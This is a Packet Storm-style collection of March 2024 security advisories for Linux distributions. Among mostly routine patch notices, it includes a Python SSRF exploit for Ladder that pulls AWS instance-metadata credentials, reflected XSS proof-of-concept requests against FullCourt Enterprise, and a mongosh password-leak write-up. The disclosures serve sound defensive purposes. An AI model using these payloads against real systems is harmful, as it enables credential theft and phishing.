Ubuntu Security Notice 6683-1 - It was discovered that HtmlCleaner incorrectly handled certain html documents. An attacker could possibly use this issue to cause a denial of service via application crash.

==========================================================================  
Ubuntu Security Notice USN-6683-1  
March 07, 2024

libhtmlcleaner-java vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

libhtmlcleaner-java could be made to crash if it received specially crafted  
input.

Software Description:  
- libhtmlcleaner-java: Java HTML Parser library

Details:

It was discovered that HtmlCleaner incorrectly handled certain html  
documents. An attacker could possibly use this issue to cause a denial  
of service via application crash.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libhtmlcleaner-java             2.24-1+deb11u1build0.22.04.1

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
  libhtmlcleaner-java             2.23-1ubuntu0.1~esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  libhtmlcleaner-java             2.21-2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6683-1  
  CVE-2023-34624

Package Information:  
  https://launchpad.net/ubuntu/+source/libhtmlcleaner-java/2.24-1+deb11u1build0.22.04.1

Ubuntu Security Notice USN-6683-1

MongoDB versions 2.0.1, 2.1.1, 2.1.4, and 2.1.5 appear to suffer from multiple localized password disclosure issues.

    Title: MongoDB MONGOSH Password Exposure VulnerabilityProduct:                   MongoDB databaseTool:                      mongoshAffected Version(s):       2.0.1 , 2.1.1,2.1.4,2.1.5Tested Version(s):         2.0.1 , 2.1.1,2.1.4,2.1.5Risk Level:                LowAuthor of Advisory:        Emad Al-Mousa*****************************************Vulnerability Details:Vulnerability in MongoDB database system "mongosh" which  is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system.MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system.*****************************************Proof of Concept (PoC):Vulnerability No1. : passwordPrompt() showing password displayed in clear textper documentation:https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPromptThe password should not be displayed, however I found out that it appears clearly in the prompt !The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear.admin> use adminalready on db adminadmin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})Enter passwordmongo*****{ ok: 1 }admin>Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth commandMongosh was tested with both “remove”& “remove-redact” modesconfig.set (redactHistory, “remove-redact”)config.set (‘redactHistory’, “remove”)In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_historyContains the password in clear text for historical  commands run for authentication db.auth() and db.createUser  , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen !In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongoshCommands running for database creation db.createUser and db.auth()  are logging the username, password explicitly as shown below:cat mongosh_repl_historyuse admindb.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})*****************************************References:https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompthttps://www.mongodb.com/docs/mongodb-shell/logs/

MongoDB 2.0.1 / 2.1.1 / 2.1.4 / 2.1.5 Local Password Disclosure

Ladder versions 0.0.1 through 0.0.21 fail to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs.

    # Exploit Title: Ladder v0.0.21 Server-side request forgery (SSRF)# Date: 2024-01-20# Exploit Author: @_chebuya# Software Link: https://github.com/everywall/ladder# Version: v0.0.1 - v0.0.21# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)# CVE: CVE-2024-27620# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context.  An attacker can access private address ranges, locally listening services, and cloud instance metadata APIsimport requestsimport jsontarget_url = "http://127.0.0.1:8080/api/"imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"r = requests.get(target_url + imdsv1_url)response_json = json.loads(r.text)print(response_json["body"])

Ladder 0.0.21 Server-Side Request Forgery

Red Hat Security Advisory 2024-1239-03 - An update for opencryptoki is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1239.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opencryptoki security updateAdvisory ID:        RHSA-2024:1239-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1239Issue date:         2024-03-08Revision:           03CVE Names:          CVE-2024-0914====================================================================Summary: An update for opencryptoki is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The opencryptoki packages contain version 2.11 of the PKCS#11 API, implemented for IBM Cryptocards, such as IBM 4764 and 4765 crypto cards. These packages includes support for the IBM 4758 Cryptographic CoProcessor (with the PKCS#11 firmware loaded), the IBM eServer Cryptographic Accelerator (FC 4960 on IBM eServer System p), the IBM Crypto Express2 (FC 0863 or FC 0870 on IBM System z), and the IBM CP Assist for Cryptographic Function (FC 3863 on IBM System z). The opencryptoki packages also bring a software token implementation that can be used without any cryptographic hardware. These packages contain the Slot Daemon (pkcsslotd) and general utilities.Security Fix(es):* opencryptoki: timing side-channel in handling of RSA PKCS#1 v1.5 padded ciphertexts (Marvin) (CVE-2024-0914)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0914References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2260407

Red Hat Security Advisory 2024-1239-03

Red Hat Security Advisory 2024-1235-03 - An update for openvswitch3.1 is now available for Fast Datapath for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1235.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openvswitch3.1 security updateAdvisory ID:        RHSA-2024:1235-03Product:            Fast DatapathAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1235Issue date:         2024-03-07Revision:           03CVE Names:          CVE-2023-3966====================================================================Summary: An update for openvswitch3.1 is now available for Fast Datapath for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.Security Fix(es):* openvswsitch: ovs-vswitch fails to recover after malformed geneve metadata packet (CVE-2023-3966)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3966References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2178363https://issues.redhat.com/browse/FD-3266https://issues.redhat.com/browse/FDP-310

Red Hat Security Advisory 2024-1235-03

Red Hat Security Advisory 2024-1234-03 - An update for openvswitch2.17 is now available for Fast Datapath for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1234.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openvswitch2.17 security updateAdvisory ID:        RHSA-2024:1234-03Product:            Fast DatapathAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1234Issue date:         2024-03-07Revision:           03CVE Names:          CVE-2023-3966====================================================================Summary: An update for openvswitch2.17 is now available for Fast Datapath for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.Security Fix(es):* openvswsitch: ovs-vswitch fails to recover after malformed geneve metadata packet (CVE-2023-3966)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3966References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2178363https://issues.redhat.com/browse/FD-3267https://issues.redhat.com/browse/FDP-308

Red Hat Security Advisory 2024-1234-03

Red Hat Security Advisory 2024-1227-03 - An update for openvswitch3.1 is now available for Fast Datapath for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1227.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: openvswitch3.1 security updateAdvisory ID:        RHSA-2024:1227-03Product:            Fast DatapathAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1227Issue date:         2024-03-07Revision:           03CVE Names:          CVE-2023-3966====================================================================Summary: An update for openvswitch3.1 is now available for Fast Datapath for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.Security Fix(es):* openvswsitch: ovs-vswitch fails to recover after malformed geneve metadata packet (CVE-2023-3966)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3966References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2178363https://issues.redhat.com/browse/FD-3269https://issues.redhat.com/browse/FDP-311

Red Hat Security Advisory 2024-1227-03

Ubuntu Security Notice 6681-1 - Wenqing Liu discovered that the f2fs file system implementation in the Linux kernel did not properly validate inode types while performing garbage collection. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service. It was discovered that the DesignWare USB3 for Qualcomm SoCs driver in the Linux kernel did not properly handle certain error conditions during device registration. A local attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6681-1March 06, 2024linux, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-iot,linux-kvm, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-iot: Linux kernel for IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-raspi: Linux kernel for Raspberry Pi systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernelDetails:Wenqing Liu discovered that the f2fs file system implementation in theLinux kernel did not properly validate inode types while performing garbagecollection. An attacker could use this to construct a malicious f2fs imagethat, when mounted and operated on, could cause a denial of service (systemcrash). (CVE-2021-44879)It was discovered that the DesignWare USB3 for Qualcomm SoCs driver in theLinux kernel did not properly handle certain error conditions during deviceregistration. A local attacker could possibly use this to cause a denial ofservice (system crash). (CVE-2023-22995)Bien Pham discovered that the netfiler subsystem in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal user could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-4244)It was discovered that a race condition existed in the Bluetooth subsystemof the Linux kernel, leading to a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-51779)It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)Alon Zahavi discovered that the NVMe-oF/TCP subsystem of the Linux kerneldid not properly handle connect command payloads in certain situations,leading to an out-of-bounds read vulnerability. A remote attacker could usethis to expose sensitive information (kernel memory). (CVE-2023-6121)It was discovered that the VirtIO subsystem in the Linux kernel did notproperly initialize memory in some situations. A local attacker could usethis to possibly expose sensitive information (kernel memory).(CVE-2024-0340)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1032-iot      5.4.0-1032.33   linux-image-5.4.0-1087-gkeop    5.4.0-1087.91   linux-image-5.4.0-1104-raspi    5.4.0-1104.116   linux-image-5.4.0-1108-kvm      5.4.0-1108.115   linux-image-5.4.0-1124-gcp      5.4.0-1124.133   linux-image-5.4.0-173-generic   5.4.0-173.191   linux-image-5.4.0-173-generic-lpae  5.4.0-173.191   linux-image-5.4.0-173-lowlatency  5.4.0-173.191   linux-image-gcp-lts-20.04       5.4.0.1124.126   linux-image-generic             5.4.0.173.171   linux-image-generic-lpae        5.4.0.173.171   linux-image-gkeop               5.4.0.1087.85   linux-image-gkeop-5.4           5.4.0.1087.85   linux-image-kvm                 5.4.0.1108.104   linux-image-lowlatency          5.4.0.173.171   linux-image-oem                 5.4.0.173.171   linux-image-oem-osp1            5.4.0.173.171   linux-image-raspi               5.4.0.1104.134   linux-image-raspi2              5.4.0.1104.134   linux-image-virtual             5.4.0.173.171Ubuntu 18.04 LTS (Available with Ubuntu Pro):   linux-image-5.4.0-1124-gcp      5.4.0-1124.133~18.04.1   linux-image-5.4.0-173-generic   5.4.0-173.191~18.04.1   linux-image-5.4.0-173-lowlatency  5.4.0-173.191~18.04.1   linux-image-gcp                 5.4.0.1124.100   linux-image-generic-hwe-18.04   5.4.0.173.191~18.04.141   linux-image-lowlatency-hwe-18.04  5.4.0.173.191~18.04.141   linux-image-oem                 5.4.0.173.191~18.04.141   linux-image-oem-osp1            5.4.0.173.191~18.04.141   linux-image-snapdragon-hwe-18.04  5.4.0.173.191~18.04.141   linux-image-virtual-hwe-18.04   5.4.0.173.191~18.04.141After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6681-1   CVE-2021-44879, CVE-2023-22995, CVE-2023-4244, CVE-2023-51779,   CVE-2023-51780, CVE-2023-51782, CVE-2023-6121, CVE-2024-0340Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-173.191   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1124.133   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1087.91   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1032.33   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1108.115   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1104.116

Ubuntu Security Notice USN-6681-1

FullCourt Enterprise version 8.2 suffers from multiple cross site scripting vulnerabilities.

# Exploit Title: FullCourt enterprise XSS  
# Date: 2023-28-12  
# Exploit Author: Omar Sabagh  
# Author Linkedin: https://www.linkedin.com/in/omar-s-b937791a2/  
# Vendor Homepage: https://www.justicesystems.com  
# Software Link: https://www.justicesystems.com/products/fullcourt-enterprise/  
# Version:  FullCourt enterprise - V8.2  
# CVE : CVE-2024-25327

# Summary:   
During a penetration test conducted in December of 2023, It was discovered that the full court enterprise web application was susceptible to reflected (obfuscated and unobfuscated) XSS attacks which could be injected in multiple parameters. This allows an attacker to redirect victims, create pop ups and load external resources (such as externally hosted images). 

# POC: 

XSS example 1.)

GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000b9wsx%3cscript%3ealert(1)%3c%2fscript%3ec5yblw44633&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.criminalJuvenileCaseDomesticViolenceIndicator=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.juryVerdict=&courtCaseBean.citationImportCase=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1

--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload b9wsx<script>alert(1)</script>c5yblw44633 was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.

--This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

--The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

XSS example 2.)

GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000vymvd%d3cscript%3ealert(1)%3c%2fscript%3erkoqwks4vtrfy0vi%3cscript%3ealert(1)%3c%2fscript%3egonoz&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1

--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload fy0vi<script>alert(1)</script>gonoz was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.

XSS example 3.)

--Unobfuscated direct URL injection  
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C<script>alert('Bob--you owe 500 dollars,click here to resolve')</script>%3Ex5zbiql8jrw&citationNumber=12345&searchAction=

--Obfuscated direct URL injection:  
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C%73cr%69pt%3E%61ler%74(%27%4F%77ned%20%62y%20%4Fm%61r%27)%3C%2f%73cr%69pt%3Ex5zbiql8jrw&citationNumber=53267&searchAction=

--For both examples, The value of the r request parameter is copied into the HTML document as plain text between tags. The payloads were submitted in the r parameter. This input was echoed unmodified in the application's response.

FullCourt Enterprise 8.2 Cross Site Scripting

Debian Linux Security Advisory 5636-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5636-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMarch 06, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-2173 CVE-2024-2174 CVE-2024-2176Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 122.0.6261.111-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXosMMACgkQZF0CR8NudjfyYw//StyDoWGq13uuZo2KfRhbd4IcesNC1Tz/hqlLbf6+BaKQ0it/oBteCcEUmwueWjpqqsxz/hfmhvTxsK+YQEAeSaV7jgVXbEz/eXqdH6VcsY2W2Ec8FiWqDgOX9wDMBUgXnHIQMvxsyEpWZ+gs7wTnfEzXGAVFVUZO+mE6dj/GRJegqTZMJ87+xivC7z+MHcmi8uoCA3jQ2LjHIot5hcVrC5RcaVnvO5W6AY/gMpcRhwPIjHk0DscVuWwv3K/+Av1eYqRpu9udr/UMxr6pLcMNEzV3a+X5WQNZQVr8wOeK/Db4J/F8xR3L+bGADb+rCI1ldwrKM3R8BQ5XU+m7vQuoEGWfS0TRirD/m/akHL9lc6a2cq4cPVCrHWTFVM0XlbKGOAIZq0l47XB2Ytg8zD3tpIAdxJfNCketuZeQ0VBYOLvBPAq975ZGYjTI4ZHgyvreBlKvFr25WSaW5+V6afyD/NjcF9CjpxqtBrlLaMLl7WdOIG4hbI7YpgnPEqzS16TphBfRb5VVmxJmrIqLgzmoBti798v0TjHa4fsRKOTgDlSPACoPu9As6fHepXNoAvs463rIj6xJ5K75Mh3mpt/tLiD9R8YPNNaplKTJGBYIsb2Zr1fAP+RJ9UzWB0jsGyh7i7uBB/gec0oropQb/5NE+cGdydNdLO+61FGXtrdm3FY==OuuM-----END PGP SIGNATURE-----

Source

Packet Storm